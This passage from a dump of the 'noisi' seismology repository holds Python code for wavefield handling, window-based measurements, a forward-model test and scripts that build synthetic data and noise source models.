window_params['hw'] = measr_config['window_params_hw']\n \n window_params['sep_noise'] = measr_config['window_params_sep_noise']\n window_params['win_overlap'] = measr_config['window_params_win_overlap']\n window_params['wtype'] = measr_config['window_params_wtype']\n window_params['causal_side'] = measr_config['window_params_causal']\n window_params['plot'] = measr_config['window_plot_measurements']\n \n\n\n if bandpass == None:\n bandpass = [None]\n if type(bandpass[0]) != list and bandpass[0] != None:\n bandpass = [bandpass]\n warn('\\'Bandpass\\' should be defined as list of filters.')\n\n if type(window_params['hw']) != list:\n 
window_params['hw'] = [window_params['hw']]\n if len(window_params['hw']) != len(bandpass):\n warn('Using the same window length for all measurements.')\n window_params['hw'] = len(bandpass)*[window_params['hw'][0]]\n if type(measr_config['g_speed']) in [float,int]:\n warn('Using the same group velocity for all measurements.')\n g_speeds = len(bandpass)*[measr_config['g_speed']]\n # ToDo: This is ugly and should be sorted out beforehand but \n # I am too lazy.\n elif type(measr_config['g_speed']) == list \\\n and len(measr_config['g_speed']) == len(bandpass):\n g_speeds = measr_config['g_speed']\n \n\n #if bandpass is None or type(bandpass[0]) != list:\n # ms = measurement(source_config,mtype,step,ignore_network,bandpass=bandpass,\n # step_test=step_test,g_speed=g_speed,window_params=window_params)\n #\n # filename = '{}.0.measurement.csv'.format(mtype)\n # ms.to_csv(os.path.join(step_dir,filename),index=None)\n\n #else:\n\n hws = window_params['hw'][:]\n\n for i in range(len(bandpass)):\n\n g_speed = g_speeds[i]\n\n window_params['hw'] = hws[i]\n ms = measurement(source_config,mtype,step,ignore_network,bandpass=bandpass[i],\n step_test=step_test,taper_perc=taper_perc,g_speed=g_speed,window_params=window_params)\n\n filename = '{}.{}.measurement.csv'.format(mtype,i)\n ms.to_csv(os.path.join(step_dir,filename),index=None)\n"
},
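The table written by measurement() above has one row per station pair. A sketch of the layout with made-up values (all numbers are illustrative placeholders, not real measurements):

import pandas as pd

columns = ['sta1','sta2','lat1','lon1','lat2','lon2','dist','az','baz',
           'syn','syn_a','obs','obs_a','l2_norm','snr','snr_a','nstack']
ms = pd.DataFrame(columns=columns)
ms.loc[0] = ['NET.STA1..CHA', 'NET.STA2..CHA', 0., 0., 0., 45.,
             5009377., 90., 270., 0.1, float('nan'), 0.12, float('nan'),
             2.0e-4, 3.5, 2.9, 10]
ms.to_csv('ln_energy_ratio.0.measurement.csv', index=None)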
{
"alpha_fraction": 0.5518391728401184,
"alphanum_fraction": 0.5575454235076904,
"avg_line_length": 36.36513137817383,
"blob_id": "e7e6a9552df03bc552b52f7125fb13ab864ed79c",
"content_id": "e1205d9fb5ae4ef4fc65c2e19f844a15170d367e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11391,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 304,
"path": "/noisi/my_classes/wavefield.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport numpy as np\nimport os\nimport h5py\n#from obspy import Trace\ntry:\n from noisi.util import plot\nexcept ImportError:\n print('Plotting unavailable, is basemap installed?')\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\n#from scipy.signal.signaltools import _next_regular\nfrom obspy.signal.invsim import cosine_taper\nfrom obspy.signal.filter import integer_decimation\nimport click\nfrom warnings import warn\n\n#ToDo: Think about having a frequency domain field as well, maybe with keyword 'fd' \n#ToDo: Think about getting an entire wavefield into memory\n#ToDo: Think about how to write stats and sourcegrid to disk at systematic points in the code.\nclass WaveField(object):\n \"\"\"\n Object to handle database of stored wavefields.\n Basically, just a few methods to work on wavefields stored in an hdf5 file. \n The stored seismograms have to have sampling rate as attribute Fs and number of time steps as attribute ntime; They have to have an ID of format net.sta.loc.cha \n \n #ToDo: Docs\n \"\"\"\n #ToDo stats entry real or complex data\n def __init__(self,file,sourcegrid=None,complex=False,w='r'):\n #shape=None,outfile=None,complex=False):\n \n #if file is not None: \n self.w = w\n self.complex = complex\n \n try: \n self.file = h5py.File(file, self.w)\n except IOError:\n msg = 'Unable to open input file ' + file\n raise IOError(msg)\n #else:\n # try: \n # self.file = h5py.File(file, 'r+')\n # except IOError:\n # msg = 'Unable to open input file ' + file\n # raise IOError(msg)\n # \n \n self.stats = dict(self.file['stats'].attrs)\n #ToDo include in stats\n #self.complex = self.stats['complex']\n self.sourcegrid = self.file['sourcegrid']\n \n if self.complex:\n self.data_r = self.file['real']\n self.data_i = self.file['imag']\n else:\n self.data = self.file['data']\n \n print(self.file)\n \n #ToDo handle complex\n # Thought about using a class method here, but need a copy of the stats!\n def copy_setup(self,newfile,nt=None,ntraces=None,complex=None,w='r+'):\n \n if complex is None:\n complex = self.complex\n # Copy the stats and sourcegrid to a new file with empty (all-zero) arrays for seismograms\n \n # Shape of the new array:\n shape = list(np.shape(self.data))\n if ntraces is not None:\n shape[0] = ntraces\n if nt is not None:\n shape[1] = nt\n shape = tuple(shape)\n \n # Create new file\n file = h5py.File(newfile, 'w-')\n \n # Copy metadata\n stats = file.create_dataset('stats',data=(0,))\n for (key,value) in self.stats.items():\n file['stats'].attrs[key] = value\n \n # Ensure that nt is kept as requested\n if nt is not None and nt != self.stats['nt']:\n file['stats'].attrs['nt'] = nt\n\n #stats.attrs['reference_station'] = self.stats['refstation']\n #stats.attrs['data_quantity'] = self.stats['data_quantity']\n #stats.attrs['ntraces'] = shape[0]\n #stats.attrs['Fs'] = self.stats['Fs']\n #stats.attrs['nt'] = shape[1]\n \n file.create_dataset('sourcegrid',data=self.sourcegrid[:].copy()) \n \n # Initialize data arrays\n if complex:\n file.create_dataset('real',shape,dtype=np.float32)\n file.create_dataset('imag',shape,dtype=np.float32) \n else:\n file.create_dataset('data',shape,dtype=np.float32)\n \n print('Copied setup of '+self.file.filename)\n file.close()\n \n 
return(WaveField(newfile,w=w,complex=complex))\n \n #def copy_setup_real_to_complex(self,newfile,w='r+'):\n # #Copy the stats and sourcegrid to a new file with empty (all-zero) arrays for seismograms\n # #extend seismograms to spectra to fit the expected length of zero-padded FFT, and add real as well as imag. part\n # file = h5py.File(newfile, 'w')\n # file.create_dataset('stats',data=(0,))\n # for (key,value) in self.stats.items():\n # file['stats'].attrs[key] = value\n # nfft = _next_regular(2*self.stats['nt']-1)\n # shape = (self.stats['ntraces'],nfft//2+1)\n # file.create_dataset('sourcegrid',data=self.sourcegrid[:].copy()) \n # file.create_dataset('real',shape,dtype=np.float32)\n # file.create_dataset('imag',shape,dtype=np.float32)\n # \n # file.close()\n # return WaveField(newfile,complex=True,w=w)\n #\n \n def truncate(self,newfile,truncate_after_seconds):\n \n nt_new = int(round(truncate_after_seconds * self.stats['Fs']))\n \n with self.copy_setup(newfile,nt=nt_new) as wf:\n \n for i in range(self.stats['ntraces']):\n if self.complex:\n wf.data_i[i,:] = self.data_i[i,0:nt_new].copy()\n wf.data_r[i,:] = self.data_r[i,0:nt_new].copy()\n else:\n wf.data[i,:] = self.data[i,0:nt_new].copy()\n \n #wf.file.close()\n \n def filter_all(self,type,overwrite=False,zerophase=True,outfile=None,**kwargs):\n \n if type == 'bandpass':\n sos = filter.bandpass(df=self.stats['Fs'],**kwargs)\n elif type == 'lowpass':\n sos = filter.lowpass(df=self.stats['Fs'],**kwargs)\n elif type == 'highpass':\n sos = filter.highpass(df=self.stats['Fs'],**kwargs)\n else:\n msg = 'Filter %s is not implemented, implemented filters: bandpass, highpass,lowpass' %type\n raise ValueError(msg)\n \n if not overwrite:\n # Create a new hdf5 file of the same shape\n newfile = self.copy_setup(newfile=outfile)\n else:\n # Call self.file newfile\n newfile = self#.file\n \n with click.progressbar(range(self.stats['ntraces']),label='Filtering..' ) as ind:\n for i in ind:\n # Filter each trace\n if zerophase:\n firstpass = sosfilt(sos, self.data[i,:]) # Read in any case from self.data\n newfile.data[i,:] = sosfilt(sos,firstpass[::-1])[::-1] # then assign to newfile, which might be self.file\n else:\n newfile.data[i,:] = sosfilt(sos,self.data[i,:])\n # flush?\n \n if not overwrite:\n print('Processed traces written to file %s, file closed, \\\n reopen to read / modify.' 
%newfile.file.filename)\n \n newfile.file.close()\n \n\n def decimate(self,decimation_factor,outfile,taper_width=0.005):\n \"\"\"\n Decimate the wavefield and save to a new file \n \"\"\"\n \n fs_old = self.stats['Fs']\n freq = self.stats['Fs'] * 0.4 / float(decimation_factor)\n\n # Get filter coeff\n sos = filter.cheby2_lowpass(fs_old,freq)\n\n # figure out new length\n temp_trace = integer_decimation(self.data[0,:], decimation_factor)\n n = len(temp_trace)\n \n\n # Get taper\n # The default taper is very narrow, because it is expected that the traces are very long.\n taper = cosine_taper(self.stats['nt'],p=taper_width)\n\n \n # Need a new file, because the length changes.\n with self.copy_setup(newfile=outfile,nt=n) as newfile:\n\n for i in range(self.stats['ntraces']):\n \n temp_trace = sosfilt(sos,taper*self.data[i,:])\n newfile.data[i,:] = integer_decimation(temp_trace, decimation_factor)\n \n \n newfile.stats['Fs'] = fs_old / float(decimation_factor)\n\n\n\n # def space_integral(self,weights=None):\n # # ToDo: have this checked; including spatial sampling!\n # # ToDo: Figure out how to assign the metadata...buh\n # trace = Trace()\n # trace.stats.sampling_rate = self.stats['Fs']\n \n # # ToDo: Thinking about weights\n # if not self.complex:\n # if weights: \n # trace.data = np.trapz(np.multiply(self.data[:],weights[:]),axis=0)\n # else:\n # trace.data = np.trapz(self.data[:],axis=0)\n # #oDo complex wavefield\n # else:\n # if weights: \n # trace.data_i = np.trapz(np.multiply(self.data_i[:],weights[:]),axis=0)\n # trace.data_r = np.trapz(np.multiply(self.data_r[:],weights[:]),axis=0)\n # else:\n # trace.data_i = np.trapz(self.data_i[:],axis=0)\n # trace.data_r = np.trapz(self.data_r[:],axis=0)\n \n # return trace\n \n \n def get_snapshot(self,t,resolution=1):\n \n #ToDo: Ask someone who knows h5py well how to do this in a nice way!\n t_sample = int(round(self.stats['Fs'] * t))\n if t_sample >= np.shape(self.data)[1]:\n warn('Requested sample is out of bounds, resetting to last sample.')\n t_sample = np.shape(self.data)[1]-1\n if resolution == 1:\n snapshot = self.data[:,t_sample]\n else:\n snapshot = self.data[0::resolution,t_sample] #0:len(self.data[:,0]):resolution\n print('Got snapshot')\n \n return snapshot\n \n #ToDo put somewhere else \n def plot_snapshot(self,t,resolution=1,**kwargs):\n \n if self.sourcegrid is None:\n msg = 'Must have a source grid to plot a snapshot.'\n raise ValueError(msg)\n \n # ToDo: Replace all the hardcoded geographical boundary values!\n map_x = self.sourcegrid[0][0::resolution]\n map_y = self.sourcegrid[1][0::resolution]\n \n plot.plot_grid(map_x,map_y,self.get_snapshot(t,resolution=resolution),**kwargs)\n \n def update_stats(self):\n \n if self.w != 'r':\n print('Updating stats...')\n self.file['stats'].attrs['ntraces'] = len(self.data[:,0]) if not self.complex else\\\n len(self.data_r[:,0])\n self.file['stats'].attrs['nt'] = len(self.data[0,:]) if not self.complex else\\\n len(self.data_r[0,:])\n self.file['stats'].attrs['complex'] = self.complex\n \n if 'stats' not in self.file.keys():\n self.file.create_dataset('stats',data=(0,))\n for (key,value) in self.stats.items():\n self.file['stats'].attrs[key] = value\n \n #print(self.file['stats'])\n #self.file.flush()\n \n #def write_sourcegrid(self):\n # self.file.create_dataset('sourcegrid',data=self.sourcegrid)\n # self.file.flush()\n \n\n def __enter__(self):\n return self\n \n def __exit__(self,type,value,traceback):\n \n self.update_stats()\n \n #ToDo update the stats\n \n self.file.close()\n \n \n 
\n \n"
},
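The zero-phase branch of WaveField.filter_all() above runs the SOS filter twice, the second time on the time-reversed trace, so the phase shifts cancel and the effective filter order doubles. A self-contained sketch of that pattern (the filter design values are arbitrary):

import numpy as np
from scipy.signal import butter, sosfilt

sos = butter(4, 0.1, btype='lowpass', output='sos')
trace = np.random.randn(1000)
firstpass = sosfilt(sos, trace)                  # forward pass
zerophase = sosfilt(sos, firstpass[::-1])[::-1]  # backward pass, re-reversed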
{
"alpha_fraction": 0.7066895365715027,
"alphanum_fraction": 0.7298456430435181,
"avg_line_length": 37.86666488647461,
"blob_id": "cf6c3f809216a3352ea0bcc3ffd3d62c997509da",
"content_id": "5f14635862e5630dbc4c320c6ad8e5f8272388d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1166,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 30,
"path": "/noisi/test/test_forward.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom obspy import read\n\ndef test_forward():\n\n\tsrcdir = os.path.join('test','testdata','testsrc')\n\tos.mkdir('test/testdata/testsrc/step_0/corr/')\n\t# copy the preprocessed wavefields\n\tos.system('mkdir '+os.path.join(srcdir,'wavefield_processed'))\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n\t\ttest/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('cp test/testdata/testsrc/wavefield_processed_archived/*.h5 \\\n\t\ttest/testdata/testsrc/wavefield_processed')\n \n\t\n\t# run forward model\n\tos.system('noisi correlation %s 0' %srcdir)\n\n\t# assert the results are the same\n\t# ToDo: path\n\ttr1 = read('test/testdata/testsrc/step_0/corr/NET.STA1..CHA--NET.STA2..CHA.sac')[0]\n\ttr2 = read('test/testdata/testsrc/step_0/corr_archived/NET.STA1..CHA--NET.STA2..CHA.sac')[0]\n\t\n\tassert ((tr1.data - tr2.data)/tr1.data).max() < 1.e-6 \n\tassert tr1.stats.sampling_rate == tr2.stats.sampling_rate\n\n\t# remove the resulting data and the preprocessed wavefields\n\tos.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr/')\n\tos.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n"
},
{
"alpha_fraction": 0.5206220149993896,
"alphanum_fraction": 0.5720081329345703,
"avg_line_length": 27.288461685180664,
"blob_id": "3b6502bc79d3f08ac711ab807083e110710f3838",
"content_id": "92710f763b97fac3397132264209663b732493d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1479,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 52,
"path": "/noisi/util/Create_Synthetic_Data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\nimport numpy as np\nfrom glob import glob\nimport os\n\n#######################\n# USER INPUT\n#######################\nsynthetics_dir = '.'\ndata_dir = 'data/'\n# coordinates:\ncoords = {'EQ.000..MXZ':(0.00,0.00),'EQ.003..MXZ':(0.00,45.),'EQ.004..MXZ':(0.00,67.5)}\n\n#######################\n\n\ntraces = glob(os.path.join(synthetics_dir,'*.sac'))\namps = np.random.rand(len(traces)*2)\n\n\ncnt = 0\nfor t in traces:\n sta1 = os.path.splitext(os.path.basename(t))[0].split('--')[0]\n sta2 = os.path.splitext(os.path.basename(t))[0].split('--')[1]\n \n datafile = os.path.join(data_dir,os.path.basename(t))\n tr = read(t)[0]\n \n i = tr.stats.npts // 2 + 1 \n tr.data[0:i] *= amps[cnt]\n cnt += 1\n tr.data[i+1:] *= amps[cnt]\n cnt += 1\n \n tr.stats.network = sta1.split('.')[0]\n tr.stats.station = sta1.split('.')[1]\n tr.stats.location = ''\n tr.stats.channel = sta1.split('.')[3]\n tr.stats.sac={}\n tr.stats.sac.kuser0 = sta2.split('.')[0]\n tr.stats.sac.kevnm = sta2.split('.')[1]\n tr.stats.sac.kuser1 = ''\n tr.stats.sac.kuser2 = sta2.split('.')[3]\n tr.stats.sac.stla = coords[sta1][0]\n tr.stats.sac.stlo = coords[sta1][1]\n tr.stats.sac.evla = coords[sta2][0]\n tr.stats.sac.evlo = coords[sta2][1]\n tr.stats.sac.dist = gps2dist_azimuth(coords[sta1][0],coords[sta1][1],coords[sta2][0],coords[sta2][1])[0]\n tr.write(datafile,format='SAC')\n \n\n\n\n"
},
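The second station of each correlation pair is stored in the SAC user headers (kuser0/kevnm/kuser1/kuser2), mirroring what get_station_info() in run_measurement.py reads back. A sketch of recovering the pair (the file name is hypothetical; empty fields may come back missing on read, which run_measurement.py guards against with an AttributeError fallback):

from obspy import read

tr = read('data/EQ.000..MXZ.sac')[0]      # hypothetical file
sta1 = tr.id                              # first station from the trace id
sta2 = '{}.{}.{}.{}'.format(tr.stats.sac.kuser0.strip(),
                            tr.stats.sac.kevnm.strip(),
                            tr.stats.sac.kuser1.strip(),
                            tr.stats.sac.kuser2.strip())
print(sta1, sta2, tr.stats.sac.dist)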
{
"alpha_fraction": 0.6372048854827881,
"alphanum_fraction": 0.647025465965271,
"avg_line_length": 30.89759063720703,
"blob_id": "5bf9829bd51f216c47f7cdaaec59c57f6895246c",
"content_id": "f39c69932cef32eb3b1720b01c079ab090abc3fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 5295,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 166,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource_basis.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'i' \n# sampling rate of synthetic Green's function in Hz\nsampling_rate = 1.0\n# length of synthetic seismograms\nn_samples = 3600\n\n################\n# geography\n################\n# list distributions: 'homogeneous', 'ocean','gaussian_blob', 'from_file'\ndistribution_types = [\n'homogeneous'\n]\n# parameters for homogeneous, ocean: none\n# parameters for gaussian blob: center (lat,lon), sigma_radius_m, only_ocean\n# parameters for from_file: filename\ndistribution_params = [\nNone\n]\n\n################\n# spectra\n################\n# list spectra for the above distributions. 'gaussian','from_file'\nspectrum_types = ['gaussian']\n# parameters for gaussian: mean, standard deviation in Hz\nspectrum_params = [ {'mean':0.15,'std':0.02,'weight':5.}]\n###############################################################################\n\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi.my_classes.basisfunction import BasisFunction\nfrom noisi.util.source_masks import get_source_mask\nfrom noisi.util.plot import plot_grid\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy.signal.invsim import cosine_taper\nimport json\n\nn = next_fast_len(2*n_samples-1) \nfreq = np.fft.rfftfreq(n,d=1./sampling_rate)\nprint(freq.shape)\ntaper = cosine_taper(len(freq),0.005)\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nbfunc_type = source_config['spectra_decomposition']\nbfunc_K = source_config['spectra_nr_parameters']\n\n\nb = BasisFunction(bfunc_type,bfunc_K,N=len(freq))\n\n\n\n\n\nspectrum_coefficients = np.zeros((len(spectrum_types),bfunc_K))\ngeographic_weights = np.zeros((len(spectrum_types),grd.shape[-1]))\n\n\ndef gauss_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['mean'])**2/\n (2*sparams['std']**2))\n return spec / np.max(np.abs(spec)) * sparams['weight']\n\n\nfor ix_spec in range(len(spectrum_types)):\n \n # get the spectrum\n if spectrum_types[ix_spec] == 'gaussian':\n spectrum = gauss_spectrum(spectrum_params[ix_spec])\n elif spectrum_types[ix_spec] == 'from_file':\n spectrum = np.load(spectrum_params[ix_spec])\n \n # decompose the spectra in the chosen basis\n coeff = b.coeff(spectrum)\n spectrum_coefficients[ix_spec,:] = coeff\n\n\n# get the geographic weights\nfor ix_geo in range(len(distribution_types)):\n\n if distribution_types[ix_geo] =='gaussian_blob':\n\n geographic_weights[ix_geo,:] = get_source_mask('gaussian',grd,\n coastres,distribution_params[ix_geo])\n print(geographic_weights[ix_geo])\n\n elif distribution_types[ix_geo] in ['ocean','homogeneous']:\n\n geographic_weights[ix_geo,:] = get_source_mask(\n distribution_types[ix_geo],grd,coastres)\n \n \n else:\n print(distributions)\n raise NotImplementedError('Unknown geographical distributions. 
\\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\n\n# get the weighted sum for each location and save\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.zeros((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n #print(geographic_weights[ix_spec,ix_loc])\n fh['model'][ix_loc,:] += geographic_weights[ix_spec,ix_loc] *\\\n spectrum_coefficients[ix_spec,:]\n\n \n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.empty((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n \n fh['model'][ix_loc,:] += spectrum_coefficients[ix_spec,:]\n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n# plot\nfor ix_spec in range(len(spectrum_types)):\n spec = np.zeros(freq.shape)\n for i in range(bfunc_K):\n spec += b.basis_vector(i,len(freq)) \\\n * spectrum_coefficients[ix_spec,i]\n plt.plot(freq,spec,linewidth=2)\n\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n#\n#plt.plot_grid(grd[0],grd[1],colored_by_frequency,\n# normalize=False,sequential=True,cmap='viridis')\n"
},
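The tapered Gaussian source spectrum built by gauss_spectrum() above, written out as a stand-alone sketch. The FFT length 7200 is an assumption, taken as next_fast_len(2*3600-1) for the sampling rate and trace length in the user input above:

import numpy as np
from obspy.signal.invsim import cosine_taper

freq = np.fft.rfftfreq(7200, d=1.0)       # zero-padded length, Fs = 1 Hz
taper = cosine_taper(len(freq), 0.005)
mean, std, weight = 0.15, 0.02, 5.        # spectrum_params from above
spec = taper * np.exp(-(freq - mean)**2 / (2 * std**2))
spec = spec / np.max(np.abs(spec)) * weight   # scale peak to 'weight'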
{
"alpha_fraction": 0.6058351397514343,
"alphanum_fraction": 0.6344233155250549,
"avg_line_length": 28.485549926757812,
"blob_id": "2601e760d3f8d1eed532e3df8f0d272bdc9a54b1",
"content_id": "0b35e1583f5f59cc5ee66aea3a05ec0140bcaf59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 5107,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 173,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n\nimport numpy as np\nfrom obspy.geodetics import gps2dist_azimuth\nfrom obspy.signal.invsim import cosine_taper\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi import WaveField\nimport json\nfrom glob import glob\nimport os\nfrom scipy.fftpack import next_fast_len\nfrom scipy.signal import hann\n\n\n##################################################################\n# USER INPUT\n##################################################################\n# path to project\nprojectpath = '../'\nsourcepath = '.'\n\n\n# geography - Add anything else than a homogeneous distribution by setting to \"True\" the following:\nonly_ocean = False\ngaussian_blobs = False\nno_background = False\nparams_gaussian_blobs = [{'center':(0.,0.),'sigma_radius_m':500000.,'rel_weight':0.00000001}]\n\n#spectra\nparams_gaussian_spectra = [{'central_freq':0.001,'sigma_freq':0.0002,'weight':10.}]\n\n###############################################################################\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nntraces = np.shape(grd)[-1]\n\nconfig = json.load(open(os.path.join(projectpath,'config.json')))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\n\nif source_config['preprocess_do']:\n ext = '*.h5'\n wavefield_path = os.path.join(sourcepath,'wavefield_processed')\nelse:\n ext = '*.h5'\n wavefield_path = config['wavefield_path']\n\n\nwfs = glob(os.path.join(wavefield_path,ext))\nif wfs != []:\n with WaveField(wfs[0]) as wf:\n df = wf.stats['Fs']\n nt = wf.stats['nt']\n \nelse:\n df = float(raw_input('Sampling rate in Hz?\\n'))\n nt = int(raw_input('Nr of time steps?\\n'))\n\n# The number of points for the fft is larger due to zeropadding --> apparent higher frequency sampling\\n\",\nn = next_fast_len(2*nt-1) \nfreq = np.fft.rfftfreq(n,d=1./df)\n \ntaper = cosine_taper(len(freq),0.01)\n\n\ndef get_distance(grid,location):\n def f(lat,lon,location):\n return abs(gps2dist_azimuth(lat,lon,location[0],location[1])[0])\n dist = np.array([f(lat,lon,location) for lat,lon in zip(grid[1],grid[0])])\n return dist\n # Use Basemap to figure out where ocean is\ndef get_ocean_mask():\n from mpl_toolkits.basemap import Basemap\n m = Basemap(rsphere=6378137,resolution='c',projection='cea',lat_0=0.,\n lon_0=0.,llcrnrlat=-90.,urcrnrlat=90.,llcrnrlon=-180.,urcrnrlon=180.)\n (x,y) = m(grd[0],grd[1])\n #ocean_mask = map(lambda (x,y): not m.is_land(x,y),zip(x,y))\n return ocean_mask\n\n\n#########################\n# Create the source distr\n#########################\n\n# geography\nnum_bases = 1\nif gaussian_blobs:\n num_bases += len(params_gaussian_blobs)\n\nbasis1 = np.zeros((num_bases,ntraces))\n\n# homogeneous layer\nbasis1[0,:] = np.ones(ntraces) \n\nif only_ocean:\n ocean_mask = np.array(get_ocean_mask()).astype(int)\n basis1[0,:] *= ocean_mask\n\n # superimposed Gaussian blob(s)\nif gaussian_blobs:\n i = 1\n for blob in params_gaussian_blobs:\n dist = get_distance(grd,blob['center'])\n basis1[i,:] = np.exp(-(dist)**2/(2*blob['sigma_radius_m']**2))\n \n if only_ocean:\n basis1[i,:] *= ocean_mask\n i+=1\n\n\n# spectra\nbasis2 = np.zeros((len(params_gaussian_spectra),len(freq)))\n# 'sort of hum gaussian'\ni = 0\nfor spec in params_gaussian_spectra:\n basis2[i,:] = taper*np.exp(-(freq-spec['central_freq'])**2/(2*spec['sigma_freq']**2))\n# This normalization means different integrals...\n basis2[i,:] /= np.max(np.abs(basis2[0,:]))\n i+=1\n\n\n######################\n# set the weights\n#####################\n# geography\nweights1 = 
np.ones(np.shape(basis1)[0])\n\nif gaussian_blobs:\n i = 1\n for blob in params_gaussian_blobs:\n weights1[i] = blob['rel_weight']\n i+=1\n if no_background:\n weights1[0] = 0.\n#\n\n\nfrom noisi.util import plot\n\n\n\ndistr = np.dot(weights1,basis1)\nplot.plot_grid(grd[0],grd[1],distr,outfile = os.path.join(sourcepath,'geog_distr_startingmodel.png'))\n\n\nplt.figure()\nplt.semilogx(freq,basis2[0,:])\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n\n\n# Save to an hdf5 file\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights1.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis2.astype(np.float32))\n\n\n# Save the 'base model' to an hdf5 file.\n\nbasis1_b = np.ones(basis1.shape)\nweights1_b = np.ones(weights1.shape)\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1_b.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights1_b.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis2.astype(np.float32))\n\n\n\n\n\n"
},
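A stand-alone sketch of the Gaussian-blob basis used above: each grid point is weighted by its great-circle distance to the blob center (toy 3-point grid; center and radius taken from params_gaussian_blobs):

import numpy as np
from obspy.geodetics import gps2dist_azimuth

grd = np.array([[0., 10., 20.], [0., 0., 0.]])   # toy lon/lat grid
center, sigma = (0., 0.), 500000.                # blob center and radius, m
dist = np.array([gps2dist_azimuth(lat, lon, center[0], center[1])[0]
                 for lat, lon in zip(grd[1], grd[0])])
blob = np.exp(-dist**2 / (2 * sigma**2))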
{
"alpha_fraction": 0.6634066700935364,
"alphanum_fraction": 0.6862265467643738,
"avg_line_length": 39.900001525878906,
"blob_id": "819680d3a8b9d5c83fa816689004ab02e29f86a8",
"content_id": "51776cdff4e070e9eec521096d7acef2f7f3e25a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 30,
"path": "/noisi/test/test_kernel.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
